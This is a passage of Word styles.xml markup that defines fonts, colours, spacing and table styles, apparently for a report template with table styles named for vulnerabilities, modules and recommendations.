    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-GB" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="MessageHeader">
    <w:name w:val="Message Header"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:shd w:val="pct10" w:color="auto" w:fill="auto"/>
      <w:ind w:left="1134" w:hanging="1134"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Newadd">
    <w:name w:val="New add"/>
    <w:basedOn w:val="Delete"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="0082212C"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
      <w:strike w:val="0"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00276AD6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PlainTextChar">
    <w:name w:val="Plain Text Char"/>
    <w:basedOn w:val="BodyTextCharChar"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="Courier New"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-GB" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:aliases w:val="Title big red"/>
    <w:basedOn w:val="Text"/>
    <w:next w:val="Text"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="008C4519"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:spacing w:before="600" w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times"/>
      <w:color w:val="CC0000"/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:aliases w:val="Title big red Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times" w:hAnsi="Utopia Std"/>
      <w:color w:val="CC0000"/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Quotered">
    <w:name w:val="Quote red"/>
    <w:basedOn w:val="Title"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteredCharChar"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteredCharChar">
    <w:name w:val="Quote red Char Char"/>
    <w:basedOn w:val="TitleChar"/>
    <w:link w:val="Quotered"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times" w:hAnsi="Utopia Std"/>
      <w:color w:val="CC0000"/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Quotebigblue">
    <w:name w:val="Quote big blue"/>
    <w:basedOn w:val="Quotered"/>
    <w:link w:val="QuotebigblueChar"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:color w:val="0092CF"/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuotebigblueChar">
    <w:name w:val="Quote big blue Char"/>
    <w:basedOn w:val="QuoteredCharChar"/>
    <w:link w:val="Quotebigblue"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times" w:hAnsi="Utopia Std"/>
      <w:color w:val="0092CF"/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Quotebigred">
    <w:name w:val="Quote big red"/>
    <w:basedOn w:val="Quotebigblue"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuotebigredChar"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuotebigredChar">
    <w:name w:val="Quote big red Char"/>
    <w:basedOn w:val="QuotebigblueChar"/>
    <w:link w:val="Quotebigred"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times" w:hAnsi="Utopia Std"/>
      <w:color w:val="FF0000"/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Quoteblue">
    <w:name w:val="Quote blue"/>
    <w:basedOn w:val="Quotered"/>
    <w:link w:val="QuoteblueCharChar"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:color w:val="0092CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteblueCharChar">
    <w:name w:val="Quote blue Char Char"/>
    <w:basedOn w:val="QuoteredCharChar"/>
    <w:link w:val="Quoteblue"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times" w:hAnsi="Utopia Std"/>
      <w:color w:val="0092CF"/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SalesConditionsSubtitle8pt">
    <w:name w:val="Sales Conditions Subtitle 8pt"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SalesConditionsSubtitle8ptChar"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:pPr>
      <w:spacing w:line="180" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SalesConditionsSubtitle8ptChar">
    <w:name w:val="Sales Conditions Subtitle 8pt Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="SalesConditionsSubtitle8pt"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:b/>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SalesConditionstext8pt">
    <w:name w:val="Sales Conditions text 8pt"/>
    <w:basedOn w:val="SalesConditionsSubtitle8pt"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00276AD6"/>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Text"/>
    <w:next w:val="Text"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="008C4519"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="600" w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:color w:val="808080"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableVulnerability">
    <w:name w:val="TableVulnerability"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="008E2093"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
      <w:sz w:val="18"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:trPr>
      <w:cantSplit/>
    </w:trPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:keepNext/>
        <w:wordWrap/>
        <w:spacing w:beforeLines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0"/>
        <w:ind w:leftChars="0" w:left="0" w:rightChars="0" w:right="0" w:firstLineChars="0" w:firstLine="284"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="5"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Pristina" w:hAnsi="Pristina"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps/>
        <w:color w:val="FFFFFF"/>
        <w:kern w:val="20"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="12" w:space="0" w:color="000000"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="CC0000"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:wordWrap/>
      </w:pPr>
      <w:rPr>
        <w:i w:val="0"/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:tr2bl w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i w:val="0"/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:tr2bl w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps/>
        <w:vanish w:val="0"/>
        <w:sz w:val="20"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
        <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
          <w14:noFill/>
          <w14:prstDash w14:val="solid"/>
          <w14:bevel/>
        </w14:textOutline>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Parade">
    <w:name w:val="Parade"/>
    <w:basedOn w:val="Text"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00A655A4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="0"/>
      <w:ind w:left="2552" w:hanging="2268"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:kern w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E94071"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="425"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8805"/>
      </w:tabs>
      <w:spacing w:before="360"/>
      <w:ind w:left="425" w:right="1882" w:hanging="425"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times"/>
      <w:b/>
      <w:color w:val="333333"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E94071"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="851"/>
        <w:tab w:val="left" w:leader="dot" w:pos="1276"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8805"/>
      </w:tabs>
      <w:spacing w:before="60" w:after="120"/>
      <w:ind w:left="850" w:right="1882" w:hanging="425"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times"/>
      <w:b/>
      <w:color w:val="808080"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E94071"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1440"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8805"/>
      </w:tabs>
      <w:spacing w:before="60" w:after="120"/>
      <w:ind w:left="1276" w:right="1882" w:hanging="567"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times"/>
      <w:color w:val="999999"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="TOC3"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00BC59AC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1440"/>
      </w:tabs>
      <w:ind w:left="1701" w:right="1134" w:hanging="709"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="TOC3"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007D0264"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto" w:shadow="1"/>
        <w:left w:val="single" w:sz="4" w:space="4" w:color="auto" w:shadow="1"/>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto" w:shadow="1"/>
        <w:right w:val="single" w:sz="4" w:space="4" w:color="auto" w:shadow="1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="E68080"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="1701"/>
        <w:tab w:val="right" w:pos="8805"/>
        <w:tab w:val="right" w:pos="9910"/>
      </w:tabs>
      <w:ind w:right="1191"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:smallCaps/>
      <w:color w:val="auto"/>
      <w:kern w:val="16"/>
      <w:sz w:val="16"/>
      <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
        <w14:srgbClr w14:val="000000">
          <w14:alpha w14:val="60000"/>
        </w14:srgbClr>
      </w14:shadow>
      <w14:textFill>
        <w14:solidFill>
          <w14:srgbClr w14:val="FFFFFF"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED614A"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Text"/>
    <w:link w:val="ListBulletChar"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FB6092"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="40"/>
      <w:ind w:left="357" w:hanging="357"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListBulletChar">
    <w:name w:val="List Bullet Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="ListBullet"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00027D8E"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOAHeading">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="000C789F"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="TOC8"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="006C770A"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="1F1083"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="StyleArial8pt">
    <w:name w:val="Style Arial 8 pt"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="0070611D"/>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NormalBefore3pt">
    <w:name w:val="Normal + Before:  3 pt"/>
    <w:aliases w:val="After:  3 pt"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B66948"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber2">
    <w:name w:val="List Number 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00A32CDC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="643"/>
      </w:tabs>
      <w:ind w:left="643" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="controlheading1">
    <w:name w:val="controlheading1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00D17B48"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="1002"/>
      </w:tabs>
      <w:spacing w:before="120"/>
      <w:ind w:left="1002" w:hanging="576"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:next w:val="Text"/>
    <w:link w:val="CodeCharChar"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="006F0A71"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeCharChar">
    <w:name w:val="Code Char Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:uiPriority w:val="19"/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w:szCs w:val="18"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ControlHeading10">
    <w:name w:val="ControlHeading1"/>
    <w:basedOn w:val="Text"/>
    <w:next w:val="Text"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00A23378"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="120" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ControlHeading2">
    <w:name w:val="ControlHeading2"/>
    <w:basedOn w:val="Text"/>
    <w:next w:val="Text"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00A23378"/>
    <w:pPr>
      <w:keepNext/>
      <w:tabs>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="120" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00A23378"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00A23378"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableModule">
    <w:name w:val="TableModule"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="008E2093"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>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pPr>
        <w:keepNext/>
        <w:wordWrap/>
        <w:spacing w:beforeLines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:i w:val="0"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:insideV w:val="single" w:sz="6" w:space="0" w:color="000000"/>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pPr>
        <w:wordWrap/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:tl2br w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableModuleHeader">
    <w:name w:val="TableModuleHeader"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="008E2093"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblBorders>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:beforeLines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="999999"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableSummary">
    <w:name w:val="TableSummary"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="008E2093"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="20" w:after="60" w:line="240" w:lineRule="atLeast"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>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keepLines/>
        <w:widowControl/>
        <w:wordWrap/>
        <w:spacing w:beforeLines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0"/>
        <w:outlineLvl w:val="9"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Utopia Std Semibold" w:hAnsi="Utopia Std Semibold"/>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lastRow">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:wordWrap/>
      </w:pPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableRecommendation">
    <w:name w:val="TableRecommendation"/>
    <w:basedOn w:val="TableNormal"/>
